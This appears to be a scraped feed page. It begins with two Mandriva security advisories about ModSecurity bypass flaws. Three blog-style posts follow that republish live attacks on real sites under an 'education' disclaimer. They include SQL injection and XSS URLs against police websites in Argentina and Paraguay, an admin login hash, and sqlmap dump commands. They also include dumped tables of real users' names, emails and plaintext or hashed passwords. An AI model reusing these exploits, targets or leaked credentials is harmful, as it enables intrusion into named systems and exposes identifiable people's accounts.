_______________________________________________________________________

Mandriva Linux Security Advisory MDVSA-2012:182
http://www.mandriva.com/security/
_______________________________________________________________________

Package : apache-mod_security
Date : December 23, 2012
Affected: 2011.
_______________________________________________________________________

Problem Description:

Multiple vulnerabilities has been discovered and corrected in
apache-mod_security:

ModSecurity before 2.6.6, when used with PHP, does not properly handle
single quotes not at the beginning of a request parameter value in
the Content-Disposition field of a request with a multipart/form-data
Content-Type header, which allows remote attackers to bypass filtering
rules and perform other attacks such as cross-site scripting (XSS)
attacks. NOTE: this vulnerability exists because of an incomplete
fix for CVE-2009-5031 (CVE-2012-2751).

ModSecurity &lt;= 2.6.8 is vulnerable to multipart/invalid part
ruleset bypass, this was fixed in 2.7.0 (released on2012-10-16)
(CVE-2012-4528).

The updated packages have been patched to correct these issues.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2751
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4528
_______________________________________________________________________

Updated Packages:

Mandriva Linux 2011:
97ce3bb44e48983170bd6f112a578c3c 2011/i586/apache-mod_security-2.6.1-1.1-mdv2011.0.i586.rpm
044aa147cd2c9b4989f47a74d04f3a62 2011/i586/mlogc-2.6.1-1.1-mdv2011.0.i586.rpm
4657a73f501344810c72d76c58532190 2011/SRPMS/apache-mod_security-2.6.1-1.1.src.rpm

Mandriva Linux 2011/X86_64:
d5e55155f32a9118977a96ea86efe1cf 2011/x86_64/apache-mod_security-2.6.1-1.1-mdv2011.0.x86_64.rpm
61d99efd771a68bb801b602294ce6efb 2011/x86_64/mlogc-2.6.1-1.1-mdv2011.0.x86_64.rpm
4657a73f501344810c72d76c58532190 2011/SRPMS/apache-mod_security-2.6.1-1.1.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFQ10wDmqjQ0CJFipgRAps5AJ4qK+9Wd2lVri03D+VVzWRgksdTkgCeOOeZ
jnUCJwVJ+dnG0N7muIDsCFM=
=u8HT
-----END PGP SIGNATURE-----

[ MDVSA-2012:183 ] apache-mod_security

$
0
0

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDVSA-2012:183
http://www.mandriva.com/security/
_______________________________________________________________________

Package : apache-mod_security
Date : December 23, 2012
Affected: Enterprise Server 5.0
_______________________________________________________________________

Problem Description:

A vulnerability has been discovered and corrected in
apache-mod_security:

ModSecurity &lt;= 2.6.8 is vulnerable to multipart/invalid part
ruleset bypass, this was fixed in 2.7.0 (released on2012-10-16)
(CVE-2012-4528).

The updated packages have been patched to correct this issue.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4528
_______________________________________________________________________

Updated Packages:

Mandriva Enterprise Server 5:
18413b1e0520660d62de9e65fb2481ce mes5/i586/apache-mod_security-2.5.12-0.3mdvmes5.2.i586.rpm
6bd19e22c13a4b5aca610c6a7049792a mes5/i586/mlogc-2.5.12-0.3mdvmes5.2.i586.rpm
70689b90d15d7fba2ae35c8a4c40a960 mes5/SRPMS/apache-mod_security-2.5.12-0.3mdvmes5.2.src.rpm

Mandriva Enterprise Server 5/X86_64:
bea5768d5f9a05b8d53426708ac7362d mes5/x86_64/apache-mod_security-2.5.12-0.3mdvmes5.2.x86_64.rpm
eea9adbbbfed5e5514a0370d2ff5b4c7 mes5/x86_64/mlogc-2.5.12-0.3mdvmes5.2.x86_64.rpm
70689b90d15d7fba2ae35c8a4c40a960 mes5/SRPMS/apache-mod_security-2.5.12-0.3mdvmes5.2.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFQ1076mqjQ0CJFipgRAmksAJ0S6kPArq56K3HgMfddaQaG7VXjIgCfTkHS
o+UKMo90pYCRMwVLHAzLh6Y=
=d+2j
-----END PGP SIGNATURE-----

SQL/XSS Policia De Buenos Aires

$
0
0

As always this information is for education purposes. We show these compromised systems so that you understand the current threat environment that surrounds us everyday and how significant it is to take the appropriate countermeasures to safeguard your critical data no matter what size your organization is as well as your individual data driven devices. Below is POC of the exploit/compromise. Again as always be proactive not reactive in safeguarding your critical data and stay safe out there. Subsequently as you are aware this blog is provided to the public to offer education in the area of IT security, creating awareness and increasing collaboration so you can implement the appropriate countermeasures such as those described in ISO13335 to prevent yourselves from becoming victims in the current threat environment,

The exploit is provided below as I will continue to monitor the net to safeguard systems and individuals critical data. Additionally this information is provided to our readers as an addendum to the California Database Security Breach Act.





######################Exploit#######################
# Exploit Title: SQL/XSS Policia De Buenos Aires
#
# Exploit Author: YeiZeta
#
# Category: Web Application
#
##############################################

SQL

http://www.personalpolicial.com.ar/recomendar_nota.php?iddato=-1
http://www.personalpolicial.com.ar/deledetalle.php?iddato=-1

XSS:

http://www.personalpolicial.com.ar/reserva.php?iddato='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000093)%3C/script%3E

http://www.personalpolicial.com.ar/noticiadetalle.php?iddato='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000066)%3C/script%3E
##############################################
https://www.facebook.com/TheJokerHack
##############################################




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

SQL/XSS POLICIA NACIONAL PARAGUAY

$
0
0
As always this information is for education purposes. We show these compromised systems so that you understand the current threat environment that surrounds us everyday and how significant it is to take the appropriate countermeasures to safeguard your critical data no matter what size your organization is as well as your individual data driven devices. Below is POC of the exploit/compromise. Again as always be proactive not reactive in safeguarding your critical data and stay safe out there. Subsequently as you are aware this blog is provided to the public to offer education in the area of IT security, creating awareness and increasing collaboration so you can implement the appropriate countermeasures such as those described in ISO13335 to prevent yourselves from becoming victims in the current threat environment,

The exploit is provided below as I will continue to monitor the net to safeguard systems and individuals critical data. Additionally this information is provided to our readers as an addendum to the California Database Security Breach Act.



######################Exploit#######################
# Exploit Title: SQL/XSS POLICIA NACIONAL PARAGUAY
#
# Exploit Author: YeiZeta
#
# Category: Web Application
#
##############################################



TABLETAS:

admin,agrupaciones,albumes,habilidades,imagenes,institucional,museoFotos,museoGalery,novedades,revistas,tramites,videos

Current DB: policiaNacional

XSS:

http://bit.ly/UZYN7E

SQL:

http://www.policianacional.gov.py/galeria_visor.php?id=1´
http://www.policianacional.gov.py/g_tramites.php?tipo=%27+OR+%27ns%27%3d%27ns&titulo=TRAMITES

Admin Login:

USUARIO:policia
contraseña:d173cab476c3c881fdc89b0dcfc18e95

http://www.policianacional.gov.py/admin/view/cms/
##############################################
https://www.facebook.com/TheJokerHack
##############################################



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

9 Recent DB Compromises Via SqlMap PoC (leaked)

$
0
0
As always this information is for education purposes. We show these compromised systems so that you understand the current threat environment that surrounds us everyday and how significant it is to take the appropriate countermeasures to safeguard your critical data no matter what size your organization is as well as your individual data driven devices. Below is POC of the compromises. Again as always be proactive not reactive in safeguarding your critical data and stay safe out there. Subsequently as you are aware this blog is provided to the public to offer education in the area of IT security, creating awareness and increasing collaboration so you can implement the appropriate countermeasures such as those described in ISO13335 to prevent yourselves from becoming victims in the current threat environment,

The exploit is provided below as I will continue to monitor the net to safeguard systems and individuals critical data. Additionally this information is provided to our readers as an addendum to the California Database Security Breach Act.




Database: ansol_ansol
Table: usuarios
[1 entry]
+------+---------------+-------+
| id_u | pw            | us    |
+------+---------------+-------+
| 1    | 234asgdasdf5$ | ansol |
+------+---------------+-------+
root@okys:/home/okys/sqlmap-dev# ./sqlmap.py -u"http://ansol.com.ar/noticia.php?id=2092" --dump -Tusuarios -Dansol_ansol


Database: serviciosesen
Table: admin
[2 entries]
+----+---------+-------+--------------------------------------------+------------+
| id | mail    | user  | pass                                       | sesion     |
+----+---------+-------+--------------------------------------------+------------+
| 1  | <blank> | admin | 177dacb14b34103960ec27ba29bd686b (alberto) | root       |
| 2  | <blank> | admin | e768332833c6e239724c3e7252428859           | seContable |
+----+---------+-------+--------------------------------------------+------------+
./sqlmap.py -u"http://www.serviciosesenciales.com.ar/libro.php?id=241" --dump -Tadmin -Dserviciosesen

The variable [cod] from [http://www.barbalha.ce.gov.br/v2/index.php?pg=secretaria&cod=25] is vulnerable to SQL Injection [Comment without quotes - MySQL].

Database: barbalha_port
Table: usuarios
[2 entries]
+----+--------------------+------------------+-----------+-----------------------+
| id | nome               | senha            | login     | email                 |
+----+--------------------+------------------+-----------+-----------------------+
| 10 | Jean Elvis         | a2diZTE3I0Ak     | jeanelvis | jeanelvis@hotmail.com |
| 12 | BadBoy de Barbalha | YmFyMTIzNGxocw== | badboy    | <blank>               |
+----+--------------------+------------------+-----------+-----------------------+


The variable [partner] from [https://www.internationalcheckout.com/coupon.php?partner=225] is vulnerable to SQL Injection [Comment without quotes - MySQL].
The variable [newsId] from [https://www.internationalcheckout.com/newsdetail.php?newsId=274] is vulnerable to SQL Injection [Comment with quotes - MySQL].
+----------+-----------+--------------+----------------+
| admin_id | admin_pwd | admin_status | admin_username |
+----------+-----------+--------------+----------------+
| 1        | admin     | 1            | admin          |
+----------+-----------+--------------+----------------+

./sqlmap.py -u"http://aviatour.travel/index.php?module=member&action=registration" --dump -Cemail,user_name,user_password -Tuser -Dvinnocrm-avia
Database: `vinnocrm-avia`
Table: user
[20 entries]
+---------+---------------+-------------------------------------------+
| email   | user_name     | user_password                             |
+---------+---------------+-------------------------------------------+
| <blank> | admin         | d357c72ac91ea3b037a71794409b7657          |
| <blank> | Elni          | 24c79a666ccf901215fb860fadb23fc7          |
| <blank> | ali           | 3861a60523ef89a017be166c5b325409 (aliali) |
| <blank> | amel          | 9968071885dbeb623c4959bd5e28eb88          |
| <blank> | reza          | ad40886c39edf4c61fed576f62720916          |
| <blank> | vanwellistest | 202cb962ac59075b964b07152d234b70 (123)    |
| <blank> | febri         | 2af48c517dc56df5f8fb5627613244cc          |
| <blank> | nova          | 6fb06bad5700269790406a00decce7ac          |
| <blank> | yenny         | 0afd7d657f177e8a072a53b2b626c394 (yenny)  |
| <blank> | william       | b2a20172c22b65cccac87d056d1a5208          |
| <blank> | hotelpackage  | f3510c5f2ca917f0f0393f1b7125cbd4          |
| <blank> | document      | 9c691c38b0c2fb9745e7facd2290f6e7          |
| <blank> | mgr_ticketing | 780db82a764efbe0704ee3e075ef3d21          |
| <blank> | ticketing2    | 775cd0b05dd50f2be57219d705d97fa2          |
| <blank> | ticketing1    | edf8e743c2b2666d2101eeacd4195dc9          |
| <blank> | tour          | e9d2b2a1635f2a3bc1fff72dfdfda928          |
| <blank> | Package       | 0bdd5dc6e318027d22eff4e07f8efcc6          |
| <blank> | management    | c4ca4238a0b923820dcc509a6f75849b (1)      |
| <blank> | socialmedia   | 81fcbb913dc1682958f127a85de6ccbf          |
| <blank> | tourop        | 22d4200187a20b64c7e27d45a071f464          |
+---------+---------------+-------------------------------------------+


+--------+-----------+-----------+------------+------------------------------------+-------------+---------------+------------------+
| UserID | User_Pass | User_Name | UserStatus | User_Email                         | basic_price | percent_price | free_order_price |
+--------+-----------+-----------+------------+------------------------------------+-------------+---------------+------------------+
| 1      | admin     | admin     | 0          | vinylbannerstore@trianglerepro.com | 1.99        | 5.00          | 150.00           |
+--------+-----------+-----------+------------+------------------------------------+-------------+---------------+------------------+

[19:03:45] [INFO] table 'vbs.tbl_admin_login' dumped to CSV file '/home/okys/sqlmap-dev/output/www.vinyl-banners-store.com/dump/vbs/tbl_admin_login.csv'
[19:03:45] [INFO] fetched data logged to text files under '/home/okys/sqlmap-dev/output/www.vinyl-banners-store.com'

Database: zerecord_main
Table: user
[1 entry]
+----+--------+--------------------+--------+------------+------------+
| id | login  | email              | passwd | lastname   | firstname  |
+----+--------+--------------------+--------+------------+------------+
| 1  | michel | shop@zerecords.com | 190608 | ZE Records | ZE Records |
+----+--------+--------------------+--------+------------+------------+

[19:03:35] [INFO] table 'zerecord_main.user' dumped to CSV file '/home/okys/sqlmap-dev/output/www.zerecords.com/dump/zerecord_main/user.csv'
[19:03:35] [INFO] fetched data logged to text files under '/home/okys/sqlmap-dev/output/www.zerecords.com'

Database: edcoengineering
Table: users
[9 entries]
+--------+-----------+-------------------------------+---------------+
| logins | user_name | user_email                    | user_password |
+--------+-----------+-------------------------------+---------------+
| 0      | admin     | s.lopes@totalsupport.com      | rihrih        |
| 0      | hoekro    | rob@edco.ch                   | rihrihrih     |
| 0      | martin    | martin.hornig@edco.ch         | albula2       |
| 0      | schrro    | r.schroter@totalsupport.nl    | robschroter   |
| 0      | luc       | luc@edco.ch                   | edcolucedco   |
| 0      | veroli    | mark@veroli.co.uk             | markedcomark  |
| 0      | carlos    | carlos@prolightcomponents.com | hejonge       |
| 0      | joost     | joost@edco.ch                 | uden2012      |
| 5      | tsadmin   | contact@totalsupport.com      | admin         |
+--------+-----------+-------------------------------+---------------+

[18:48:12] [INFO] table 'edcoengineering.users' dumped to CSV file '/home/okys/sqlmap-dev/output/www.edcoengineering.nl/dump/edcoengineering/users.csv'
[18:48:12] [INFO] fetched data logged to text files under '/home/okys/sqlmap-dev/output/www.edcoengineering.nl'

Database: intranet
Table: joo_users
[3 entries]
+----------------------+--------------------------------------+----------------+------------+-------------------------------------------------------------------+
| name                 | email                                | username       | usertype   | password                                                          |
+----------------------+--------------------------------------+----------------+------------+-------------------------------------------------------------------+
| maria veronica arana | veronica.arana@bariloche.inta.gov.ar | veronica.arana | <blank>    | 978adce457c616e4017be5d7d2451ac5:J0v2Jts3WlENkELYMUnM1b8dvsZi9u1v |
| Sonia Mabel Garcia   | sgarcia@bariloche.inta.gov.ar        | sgarcia        | <blank>    | 80e411f46e0bc1bf4ee1ba668f5ec4de:PPUW7CUSyZ6h5bLDNcv7vdmjbdly46r6 |
| Super User           | plagorio@bariloche.inta.gov.ar       | admin          | deprecated | e84a2e3ed4bec4f8b81520e6a5bd3bcf:2ueqTZjUYgrGl64UuPAgQC0nHRnyCcge |
+----------------------+--------------------------------------+----------------+------------+-------------------------------------------------------------------+
sqlmap.py -u"http://sipan.inta.gov.ar/index.php?url=aXZuL2luZGljZV9kZXRhbGxlLnBocA==&idpoligono=5&mes=7&anio=2028" --dump -Cemail,name,password,username,usertype -Tjoo_users -D intranet

+---------+----------------------------------+
| login   | password                         |
+---------+----------------------------------+
| alberto | 26dceee339cb96da2d3f81ab00f39490 |
| miguel  | ab7d9d81541cd0d70e8e8d670eee512d |
| pablo   | 6d92bf19c4b525ead8557415ec241f7c |
| root    | 36c1c60e8dc1bff0c7823a2e0cb3fd11 |
+---------+----------------------------------+
./sqlmap.py -u"https://www.banduawargames.com/categoria.php?id=0" --dump -Clogin,password -Tadministradores -Dwargamesbandua_web

tiene cc
./sqlmap.py -u"https://www.worldtibe.com/en/specialist/detail.php?id=2&c=141&p=1" -p "id" --column -TOrdersPayment -Dorientta_DB

 ./sqlmap.py -u"http://www.artofliving.org/za-en/public-programs?scenter=8279" -p "scenter" --table -Dgwebdb_global






//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Viewing all 8064 articles
Browse latest View live